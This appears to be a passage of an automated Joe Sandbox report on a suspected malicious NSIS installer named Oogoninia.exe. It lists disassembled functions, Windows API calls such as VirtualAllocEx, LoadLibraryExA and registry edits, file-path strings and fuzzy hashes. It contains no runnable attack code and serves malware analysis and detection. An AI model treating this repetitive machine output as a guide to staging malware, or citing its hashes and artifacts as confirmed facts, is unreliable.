• Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
Similarity
• API ID: CloseCreateValuelstrlen
• String ID: C:\Users\user\AppData\Local\Temp\nsqBBFB.tmp
• API String ID: 1356686001-3724976337
• Opcode ID: 2eae85450b92eca2a3c37eaf8981f1ba2892586689a29081bc0333428de2e0a2
• Instruction ID: 00e854f1b6d20388f4b464fcc1b804607db5fe0ac9957b4d3390b69bb90c797e
• Opcode Fuzzy Hash: 2eae85450b92eca2a3c37eaf8981f1ba2892586689a29081bc0333428de2e0a2
• Instruction Fuzzy Hash: 3921A1B1E00109BEEB00EFA4DE49EAF7A78EB50358F20403AF505B61D1C6B85D019B28

Control-flow Graph

control_flow_graph 778 405a42-405a4c 779 405a4d-405a78 GetTickCount GetTempFileNameA 778->779 780 405a87-405a89 779->780 781 405a7a-405a7c 779->781 783 405a81-405a84 780->783 781->779 782 405a7e 781->782 782->783
APIs
• GetTickCount.KERNEL32 ref: 00405A56
• GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 00405A70
Strings
• C:\Users\user\AppData\Local\Temp\, xrefs: 00405A45
• "C:\Users\user\Desktop\Oogoninia.exe", xrefs: 00405A42
• nsa, xrefs: 00405A4D
Memory Dump Source
• Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CountFileNameTempTick
                                                                                                                                                                                    • String ID: "C:\Users\user\Desktop\Oogoninia.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                                                                    • API String ID: 1716503409-3045471738
                                                                                                                                                                                    • Opcode ID: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
                                                                                                                                                                                    • Instruction ID: a3d8867ec022398f00e7cc0b64f9ef92c2764b579e17a6718397eb4594f2c545
                                                                                                                                                                                    • Opcode Fuzzy Hash: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 07F0E2327082047BDB108F55EC44B9B7B9CDF91750F10C037FE049A180D2B198448F59

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 802 100016bd-100016f9 call 10001a5d 806 1000180a-1000180c 802->806 807 100016ff-10001703 802->807 808 10001705-1000170b call 100021b0 807->808 809 1000170c-10001719 call 100021fa 807->809 808->809 814 10001749-10001750 809->814 815 1000171b-10001720 809->815 816 10001770-10001774 814->816 817 10001752-1000176e call 100023da call 10001559 call 10001266 GlobalFree 814->817 818 10001722-10001723 815->818 819 1000173b-1000173e 815->819 823 100017b2-100017b8 call 100023da 816->823 824 10001776-100017b0 call 10001559 call 100023da 816->824 839 100017b9-100017bd 817->839 821 10001725-10001726 818->821 822 1000172b-1000172c call 100027e8 818->822 819->814 825 10001740-10001741 call 10002aa3 819->825 827 10001733-10001739 call 10002589 821->827 828 10001728-10001729 821->828 834 10001731 822->834 823->839 824->839 837 10001746 825->837 843 10001748 827->843 828->814 828->822 834->837 837->843 844 100017fa-10001801 839->844 845 100017bf-100017cd call 100023a0 839->845 843->814 844->806 850 10001803-10001804 GlobalFree 844->850 852 100017e5-100017ec 845->852 853 100017cf-100017d2 845->853 850->806 852->844 855 100017ee-100017f9 call 100014e2 852->855 853->852 854 100017d4-100017dc 853->854 854->852 856 100017de-100017df FreeLibrary 854->856 855->844 856->852
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC4
                                                                                                                                                                                      • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC9
                                                                                                                                                                                      • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CCE
                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 10001768
                                                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 100017DF
                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                                                                                                                                      • Part of subcall function 100021B0: GlobalAlloc.KERNEL32(00000040,7D8BEC45), ref: 100021E2
                                                                                                                                                                                      • Part of subcall function 10002589: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,10001739,00000000), ref: 100025FB
                                                                                                                                                                                      • Part of subcall function 10001559: lstrcpyA.KERNEL32(00000000,?,00000000,10001695,00000000), ref: 10001572
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1196297422.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1196258164.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1196329175.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1196354573.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_10000000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1791698881-3916222277
                                                                                                                                                                                    • Opcode ID: ee4c9fc9ebc314f30cf8369a5322713cb2bdaef71cd7754c4cd252d6b1501433
                                                                                                                                                                                    • Instruction ID: 7bd52774c71d274dd6e07030a7ef65efb9a892d3f5f2eddd47f658e3267813e4
                                                                                                                                                                                    • Opcode Fuzzy Hash: ee4c9fc9ebc314f30cf8369a5322713cb2bdaef71cd7754c4cd252d6b1501433
                                                                                                                                                                                    • Instruction Fuzzy Hash: B5319C79408205DAFB41DF649CC5BCA37ECFF042D5F018465FA0A9A09EDF78A8858B60

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 859 405900-40591b call 405da0 call 4058ab 864 405921-40592e call 40600b 859->864 865 40591d-40591f 859->865 869 405930-405934 864->869 870 40593a-40593c 864->870 866 405973-405975 865->866 869->865 871 405936-405938 869->871 872 405952-40595b lstrlenA 870->872 871->865 871->870 873 40595d-405971 call 405812 GetFileAttributesA 872->873 874 40593e-405945 call 4060a4 872->874 873->866 879 405947-40594a 874->879 880 40594c-40594d call 405859 874->880 879->865 879->880 880->872
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00405DA0: lstrcpynA.KERNEL32(?,?,00000400,0040322E,Leafier Setup,NSIS Error), ref: 00405DAD
                                                                                                                                                                                      • Part of subcall function 004058AB: CharNextA.USER32(?,?,C:\,?,00405917,C:\,C:\,766B3410,?,C:\Users\user\AppData\Local\Temp\,00405662,?,766B3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058B9
                                                                                                                                                                                      • Part of subcall function 004058AB: CharNextA.USER32(00000000), ref: 004058BE
                                                                                                                                                                                      • Part of subcall function 004058AB: CharNextA.USER32(00000000), ref: 004058D2
                                                                                                                                                                                    • lstrlenA.KERNEL32(C:\,00000000,C:\,C:\,766B3410,?,C:\Users\user\AppData\Local\Temp\,00405662,?,766B3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405953
                                                                                                                                                                                    • GetFileAttributesA.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,766B3410,?,C:\Users\user\AppData\Local\Temp\,00405662,?,766B3410,C:\Users\user\AppData\Local\Temp\), ref: 00405963
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                                    • String ID: C:\$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                    • API String ID: 3248276644-2214159804
                                                                                                                                                                                    • Opcode ID: 2b232cbcfe35a2a259e0e65083c3ab1013c8774cdbeba63489dc7f6696da3121
                                                                                                                                                                                    • Instruction ID: 7328fd33adb38864c40c3ad9044401c3b5e3aae7bd0e1b9e961d96be1e2df883
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2b232cbcfe35a2a259e0e65083c3ab1013c8774cdbeba63489dc7f6696da3121
                                                                                                                                                                                    • Instruction Fuzzy Hash: D5F0A466115D6096D722333A1C05B9F1A48CEC2374759453BF891F12D2DB3C8953DD7E
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 0040202A
                                                                                                                                                                                      • Part of subcall function 00404FB9: lstrlenA.KERNEL32(0079DD20,00000000,0078FCF8,766B23A0,?,?,?,?,?,?,?,?,?,0040306B,00000000,?), ref: 00404FF2
                                                                                                                                                                                      • Part of subcall function 00404FB9: lstrlenA.KERNEL32(0040306B,0079DD20,00000000,0078FCF8,766B23A0,?,?,?,?,?,?,?,?,?,0040306B,00000000), ref: 00405002
                                                                                                                                                                                      • Part of subcall function 00404FB9: lstrcatA.KERNEL32(0079DD20,0040306B,0040306B,0079DD20,00000000,0078FCF8,766B23A0), ref: 00405015
                                                                                                                                                                                      • Part of subcall function 00404FB9: SetWindowTextA.USER32(0079DD20,0079DD20), ref: 00405027
                                                                                                                                                                                      • Part of subcall function 00404FB9: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040504D
                                                                                                                                                                                      • Part of subcall function 00404FB9: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405067
                                                                                                                                                                                      • Part of subcall function 00404FB9: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405075
                                                                                                                                                                                    • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 0040203A
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0040204A
                                                                                                                                                                                    • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 004020B4
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
Similarity
• API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
• String ID:
• API String ID: 2987980305-0
• Opcode ID: dcd88b9650ca2fc532c8c5fc9ad8650594621bf6dfbf7b98fc17d5296bd1316f
• Instruction ID: 6acd92e4f6ebcd949653744c87f359efbc1ef98484dd96508818b65b31ed9250
• Opcode Fuzzy Hash: dcd88b9650ca2fc532c8c5fc9ad8650594621bf6dfbf7b98fc17d5296bd1316f
• Instruction Fuzzy Hash: 5921F671E00225EBDF307FA48F48AAE7A706B45354F20023BF701B22D1C6BE4A42D65E
APIs
  • Part of subcall function 004058AB: CharNextA.USER32(?,?,C:\,?,00405917,C:\,C:\,766B3410,?,C:\Users\user\AppData\Local\Temp\,00405662,?,766B3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058B9
  • Part of subcall function 004058AB: CharNextA.USER32(00000000), ref: 004058BE
  • Part of subcall function 004058AB: CharNextA.USER32(00000000), ref: 004058D2
• GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
  • Part of subcall function 0040547F: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004054C2
• SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\slavelivets,00000000,00000000,000000F0), ref: 0040163C
Strings
• C:\Users\user\slavelivets, xrefs: 00401631
Memory Dump Source
• Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
Similarity
• API ID: CharNext$Directory$AttributesCreateCurrentFile
• String ID: C:\Users\user\slavelivets
• API String ID: 1892508949-1403250623
• Opcode ID: 180f8dbed9302a858d7acc3d4175b887fc009ffc70d4c8ebc0bf4da9f8c84f7e
• Instruction ID: f4e9a0c94948f709858838e9eb50a0f2792b4ff72a3a1ac07d5dbe4c8cdc963c
• Opcode Fuzzy Hash: 180f8dbed9302a858d7acc3d4175b887fc009ffc70d4c8ebc0bf4da9f8c84f7e
• Instruction Fuzzy Hash: D3112731508052EBDB217BB54D409BF26B09E92324B28457FF8D2B22E2D63D4D43A63F
APIs
• RegOpenKeyExA.KERNELBASE(80000002,00405ECC,00000000,00000002,?,00000002,0011C6A5,?,00405ECC,80000002,Software\Microsoft\Windows\CurrentVersion,0011C6A5,Call,008BE61D), ref: 00405CB0
• RegQueryValueExA.KERNELBASE(0011C6A5,?,00000000,00405ECC,0011C6A5,00405ECC), ref: 00405CD1
• RegCloseKey.KERNELBASE(?), ref: 00405CF2
Memory Dump Source
• Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
• Opcode ID: 0c8888e50600bbfc423f29d3e13c34afc4b2d72f1a725d9a4029968a390a76be
• Instruction ID: a78e2699c87532439836dc2b9ae7a1408ac691edae8af3cd19914ba1cc6957ae
• Opcode Fuzzy Hash: 0c8888e50600bbfc423f29d3e13c34afc4b2d72f1a725d9a4029968a390a76be
• Instruction Fuzzy Hash: 9C015A7254420AEFEB128F65EC45EEB3FACEF14354F004436F905A6220D235D964DBA5
APIs
• VirtualAllocEx.KERNELBASE(00000000), ref: 100028A7
• GetLastError.KERNEL32 ref: 100029AE
Memory Dump Source
• Source File: 00000000.00000002.1196297422.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.1196258164.0000000010000000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000000.00000002.1196329175.0000000010003000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000000.00000002.1196354573.0000000010005000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_Oogoninia.jbxd
Similarity
• API ID: AllocErrorLastVirtual
• String ID:
• API String ID: 497505419-0
• Opcode ID: 7af5c486cb8ea8547353861cfd678fbd8d20862330e18d67419e74999799b2ae
• Instruction ID: 700bf99a33fcd989ee77f819fa46e2371db99389a88ce2eb288524e3b596c0af
• Opcode Fuzzy Hash: 7af5c486cb8ea8547353861cfd678fbd8d20862330e18d67419e74999799b2ae
• Instruction Fuzzy Hash: 9751A2BA908214DFFB10DF64DCC674937A4EB443D4F21842AEA08E726DCF34A9808B95
APIs
  • Part of subcall function 00402BD8: RegOpenKeyExA.KERNELBASE(00000000,00000642,00000000,00000022,00000000,?,?,?,00402383,00000002), ref: 00402C00
• RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024B3
• RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsqBBFB.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040254F
Memory Dump Source
• Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
• Opcode ID: 8e26defd033098e931a340efcbebfcd7db4374a64648cb469e792002de33b0c4
• Instruction ID: 0483b46094dd03155b9d0e3ed9d5b90596ace3d3fa60599072770b53af9213ab
• Opcode Fuzzy Hash: 8e26defd033098e931a340efcbebfcd7db4374a64648cb469e792002de33b0c4
• Instruction Fuzzy Hash: 8811E371A05205EFDB20CF60CA985AEBBB4AF00359F20443FE142B72C0D2B84A81DB5A
APIs
• MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
• SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
Memory Dump Source
• Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: b63ad44f694a207690e677ec35bda8f999f5426b301403e6904e10af90410016
• Instruction ID: 00097469377630013da62b9f7c31fbdee85021c234e60ac5accdaffcc3ed26dc
• Opcode Fuzzy Hash: b63ad44f694a207690e677ec35bda8f999f5426b301403e6904e10af90410016
• Instruction Fuzzy Hash: BE01F4316242209BF7194B389C04B6A3698E751354F10813BF811F62F1D678DC028B4D
APIs
  • Part of subcall function 00402BD8: RegOpenKeyExA.KERNELBASE(00000000,00000642,00000000,00000022,00000000,?,?,?,00402383,00000002), ref: 00402C00
• RegDeleteValueA.ADVAPI32(00000000,00000000,00000033,00000002), ref: 00402396
• RegCloseKey.ADVAPI32(00000000), ref: 0040239F
Memory Dump Source
• Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
Similarity
• API ID: CloseDeleteOpenValue
• String ID:
• API String ID: 849931509-0
• Opcode ID: c3c705181fe5658603166456b70eb915c97a04fc9575d71e791babf096fcf5eb
• Instruction ID: 60c1e4243d723511b4c64426b25872ec533dbc6a778a8c73d92c97a5d2103592
• Opcode Fuzzy Hash: c3c705181fe5658603166456b70eb915c97a04fc9575d71e791babf096fcf5eb
• Instruction Fuzzy Hash: 37F0A472A00111ABD710AFA09A8E9BE72A89B40344F24043BF201B71C0D5BD5D019769
APIs
• ExpandEnvironmentStringsA.KERNELBASE(00000000,?,00000400,00000001), ref: 00401A31
• lstrcmpA.KERNEL32(?,?,?,00000400,00000001), ref: 00401A44
Memory Dump Source
• Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
Similarity
• API ID: EnvironmentExpandStringslstrcmp
• String ID:
• API String ID: 1938659011-0
• Opcode ID: e8d900abad3d3f7b08a48ee3306f5f417189d62f9577d7b4a96c9798fa742101
• Instruction ID: 4f813d77772bd54bf890c65dc17d1f1cff84f8c3aa104cf5f65d7bfaad8725e5
• Opcode Fuzzy Hash: e8d900abad3d3f7b08a48ee3306f5f417189d62f9577d7b4a96c9798fa742101
• Instruction Fuzzy Hash: 3BF08231B05241EBCB20DF659D45A9A7FE8EFD1394B10843BE145F6190D2388541DA69
APIs
• GetModuleHandleA.KERNEL32(?,?,?,004031EA,00000009), ref: 0040614B
• GetProcAddress.KERNEL32(00000000,?), ref: 00406166
  • Part of subcall function 004060CB: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004060E2
  • Part of subcall function 004060CB: wsprintfA.USER32 ref: 0040611B
  • Part of subcall function 004060CB: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040612F
Memory Dump Source
• Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
Similarity
• API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
• String ID:
• API String ID: 2547128583-0
• Opcode ID: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
